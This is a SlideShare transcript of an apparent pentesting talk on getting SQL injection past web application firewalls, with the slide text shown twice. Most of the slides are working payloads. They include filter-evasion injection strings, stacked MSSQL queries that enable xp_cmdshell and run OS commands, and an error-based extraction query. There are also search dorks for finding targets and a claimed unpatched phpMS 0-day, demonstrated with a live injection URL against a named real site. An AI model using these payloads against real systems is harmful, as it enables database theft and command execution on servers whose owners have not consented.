SlideShare a Scribd company logo

Sql Injections With Real Life Scenarious

Download as PPTX, PDF
Francis Alexander
Francis Alexander

SQL Injections Within Real Life Scenarious . We take upon various situations where out of the box thinking was required.

Related slideshows

Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyond
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
1 of 30
By Francis Alexander
• Got Listed at ebay and Microsoft security Researchers List • Worked as free lance security researcher for tech2.in.com and in.com • Found SQLi vulnerabilities at kerala enterance portal website • http://tech2.in.com/news/gene ral/updated-serious- vulnerability-affects-kerala- common-entrance-exams- portal/369982 • Basically the InfoSec Researcher Guy 
Strictly waf based and Real Life Based Scenarious  MsSql Stack Based Queries(thought it as a good addon) A PHP-MS 0-DAY 
First among the OWASP TOP 10 vulnerabilities Used for gaining access to sql database and hence the b0x Mainly of 5 types  Union based  Error based  X-path based  Blind and Time based  Double Query based
So whats the catch here!!! Pentesting real life scenarious is much difficult than ever Sqli has been patched and firewalls, IDS and IPS installed everywhere Exploiting Sqli has been difficult and tools has disappointed to !
Ofcourse Failure of Sqlmap !!! Failure of Havij which by the way is always a failure :p IDS , IPS and other firewall family Apache security modules mod_sec,htmlentities,mysql_escape,magic_quotes and all my dear appsec modules
What are they !!? Well we need to overcome the situation that has come rather than site and lament over it Here will focusing on the real life scenarious where the tools fail and much of our human hard work comes in
Preg_match is a comparer statement used in php Mainly deployed by small scale waf’s Poorly coded ones the easier an example
Used when “select” + any case letters are blocked 'select'+'(A-Za-z)‘ So any letter after select gets filtered out Solution Mysql has an option called stored variable procedure “@” is a sign that can be used as a prefix, that denotes stored procedure, function parameter names, and variables names.
So how do we do it? Union select 1,2,3 - - = 403 Forbidden So It changes to and (@:=version()) union select 1,@,3- - = bypassed
 So whats the Catch here   Most of us love the dork inurl:php?id= site:blah.com  So what has happened most admins have changed the id= parameters to within the url and making the tools go wreckless and n00bs go mad  An example would be the usuall way was site.com/index.php?id= ,now they have gone on and changed to site.com/index-goods-12.html  An example site that has no point of injection at the first sight  Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je- suis-prete,884.html
Sql Injections With Real Life Scenarious
Usual commenting style should be followed here ie the “- -” other wise other forms like %23(#) and /* could cause the browser to misinterpret the statement as a comment hence commenting out the rest and not letting it read the .html part In most cases encountered these type of injections, there are white spaces which often cause a havoc and nightmare for scanners
 Well dealing with white spaces depends on different scenarios  U could use the traditional commenting style like  id=3/**/union/**/select 1,2,3 or  Well the problem is /**/ might be filtered in some cases  So we use the ()which is the same as executing the query  id=(2)union(select(1),2,3)  NB:During html based injections it is better to use the paranthesis
 Based on Error 1222  Came across CTF’s where the answer had to be in normal union based .  Most tools fails here since the vulnerable column is being parsed in between the html tags.  Usually union statements are being provided here but the columns do not get displayed.  So what do we do ?  Plse don’t say we look over the source because ur not gonna find anything at the first shot 
Sql Injections With Real Life Scenarious
We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333 This helps us to search in the source but still nt available on screen.
If u could like to display it on screen u could use concat or group_concat functions and using html inside them Use hex of html if the quotes are blocked due to magic quotes Here we could see the version on closing the “</title>” tag since the vulnerable column was being displayed within the title block
Bypassing errors 400/403/404/406  //convert(group_concat(schema_name) using ascii) from information_schema.schemata - -  C-style Commenting : /*!Union*/+/*!Select*/ //apart from the original source commenting the ! Executes the command  Character Encoding :Bypasses filters like 400 %55nion/**/%53elect  Sub queries : Union (select 1,2,3) //Where most WAF’s fail out
 id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a  // # is comment but the %0A bypasses with the new line so the statements gets executed  Bypassing Error 1064  Usually related with blocking of white spaces  id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0)) // the queries are supplied in parenthesis so as to forbid the use of white spaces  “/**/ “Commenting also possible  Bypassing Error 500  and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+ // WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data. Give a large amount of data allows our code executing
Stacked queries mainly available in mssql and postgresql servers Underlying process is simple if chmdshell options are enable then u are in  Stacked Queries Support is Checked on Server using 'WAITFOR DELAY hour:min:sec’ For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'- - - would check whether cmdshell is enabled or nt depending upon time lag.
 http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced options', 1-- -  http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -  http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1- - -  http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
Sql Injections With Real Life Scenarious
Just to prove that still this exists a Real Life – demo 
http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));-- // Creates the table funkyfresh http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- - // WE declare a variable @funky and store it with hex equi. Of the code NOTE: 0x77686f616d69 => 'whoami‘
 /!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+C HAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHA R(93))) // Creadits to Bernardo's original write-up from BlackHat //The reason I took it although a bit complicated works for no reason seamlessly  Read the temp table to get the results and you need to make sure you deal with same data type when you do...
Sql Injections With Real Life Scenarious
 0-day by me   phpMS - a free CMS (content management system),  Designed for rapid development and support of web-projects of any complexity.  Features CMS phpMS:  Easy to install;  Multi-level menus;  Arbitrary arrangement of blocks;  Simple module development;  Access rights
Demo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=- 7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6-- #By default 6 columns in most cases seen so could use this as default in sites discovered #Finding the admin page of this makes it very easy to exploit  # Default admin page is admin.php :-) Eg : http://www.site.com/admin.php :)
References  Couple of Blackhat talks and papers  kaotickreations.blogspot.in (my blog)  http://websec.wordpress.com/tag/sql-filter-evasion/

More Related Content

Sql Injections With Real Life Scenarious

  • 2. • Got Listed at ebay and Microsoft security Researchers List • Worked as free lance security researcher for tech2.in.com and in.com • Found SQLi vulnerabilities at kerala enterance portal website • http://tech2.in.com/news/gene ral/updated-serious- vulnerability-affects-kerala- common-entrance-exams- portal/369982 • Basically the InfoSec Researcher Guy 
  • 3. Strictly waf based and Real Life Based Scenarious  MsSql Stack Based Queries(thought it as a good addon) A PHP-MS 0-DAY 
  • 4. First among the OWASP TOP 10 vulnerabilities Used for gaining access to sql database and hence the b0x Mainly of 5 types  Union based  Error based  X-path based  Blind and Time based  Double Query based
  • 5. So whats the catch here!!! Pentesting real life scenarious is much difficult than ever Sqli has been patched and firewalls, IDS and IPS installed everywhere Exploiting Sqli has been difficult and tools has disappointed to !
  • 6. Ofcourse Failure of Sqlmap !!! Failure of Havij which by the way is always a failure :p IDS , IPS and other firewall family Apache security modules mod_sec,htmlentities,mysql_escape,magic_quotes and all my dear appsec modules
  • 7. What are they !!? Well we need to overcome the situation that has come rather than site and lament over it Here will focusing on the real life scenarious where the tools fail and much of our human hard work comes in
  • 8. Preg_match is a comparer statement used in php Mainly deployed by small scale waf’s Poorly coded ones the easier an example
  • 9. Used when “select” + any case letters are blocked 'select'+'(A-Za-z)‘ So any letter after select gets filtered out Solution Mysql has an option called stored variable procedure “@” is a sign that can be used as a prefix, that denotes stored procedure, function parameter names, and variables names.
  • 10. So how do we do it? Union select 1,2,3 - - = 403 Forbidden So It changes to and (@:=version()) union select 1,@,3- - = bypassed
  • 11.  So whats the Catch here   Most of us love the dork inurl:php?id= site:blah.com  So what has happened most admins have changed the id= parameters to within the url and making the tools go wreckless and n00bs go mad  An example would be the usuall way was site.com/index.php?id= ,now they have gone on and changed to site.com/index-goods-12.html  An example site that has no point of injection at the first sight  Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je- suis-prete,884.html
  • 13. Usual commenting style should be followed here ie the “- -” other wise other forms like %23(#) and /* could cause the browser to misinterpret the statement as a comment hence commenting out the rest and not letting it read the .html part In most cases encountered these type of injections, there are white spaces which often cause a havoc and nightmare for scanners
  • 14.  Well dealing with white spaces depends on different scenarios  U could use the traditional commenting style like  id=3/**/union/**/select 1,2,3 or  Well the problem is /**/ might be filtered in some cases  So we use the ()which is the same as executing the query  id=(2)union(select(1),2,3)  NB:During html based injections it is better to use the paranthesis
  • 15.  Based on Error 1222  Came across CTF’s where the answer had to be in normal union based .  Most tools fails here since the vulnerable column is being parsed in between the html tags.  Usually union statements are being provided here but the columns do not get displayed.  So what do we do ?  Plse don’t say we look over the source because ur not gonna find anything at the first shot 
  • 17. We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333 This helps us to search in the source but still nt available on screen.
  • 18. If u could like to display it on screen u could use concat or group_concat functions and using html inside them Use hex of html if the quotes are blocked due to magic quotes Here we could see the version on closing the “</title>” tag since the vulnerable column was being displayed within the title block
  • 19. Bypassing errors 400/403/404/406  //convert(group_concat(schema_name) using ascii) from information_schema.schemata - -  C-style Commenting : /*!Union*/+/*!Select*/ //apart from the original source commenting the ! Executes the command  Character Encoding :Bypasses filters like 400 %55nion/**/%53elect  Sub queries : Union (select 1,2,3) //Where most WAF’s fail out
  • 20.  id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a  // # is comment but the %0A bypasses with the new line so the statements gets executed  Bypassing Error 1064  Usually related with blocking of white spaces  id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0)) // the queries are supplied in parenthesis so as to forbid the use of white spaces  “/**/ “Commenting also possible  Bypassing Error 500  and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+ // WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data. Give a large amount of data allows our code executing
  • 21. Stacked queries mainly available in mssql and postgresql servers Underlying process is simple if chmdshell options are enable then u are in  Stacked Queries Support is Checked on Server using 'WAITFOR DELAY hour:min:sec’ For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'- - - would check whether cmdshell is enabled or nt depending upon time lag.
  • 22.  http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced options', 1-- -  http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -  http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1- - -  http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
  • 24. Just to prove that still this exists a Real Life – demo 
  • 25. http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));-- // Creates the table funkyfresh http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- - // WE declare a variable @funky and store it with hex equi. Of the code NOTE: 0x77686f616d69 => 'whoami‘
  • 26.  /!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+C HAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHA R(93))) // Creadits to Bernardo's original write-up from BlackHat //The reason I took it although a bit complicated works for no reason seamlessly  Read the temp table to get the results and you need to make sure you deal with same data type when you do...
  • 28.  0-day by me   phpMS - a free CMS (content management system),  Designed for rapid development and support of web-projects of any complexity.  Features CMS phpMS:  Easy to install;  Multi-level menus;  Arbitrary arrangement of blocks;  Simple module development;  Access rights
  • 29. Demo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=- 7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6-- #By default 6 columns in most cases seen so could use this as default in sites discovered #Finding the admin page of this makes it very easy to exploit  # Default admin page is admin.php :-) Eg : http://www.site.com/admin.php :)
  • 30. References  Couple of Blackhat talks and papers  kaotickreations.blogspot.in (my blog)  http://websec.wordpress.com/tag/sql-filter-evasion/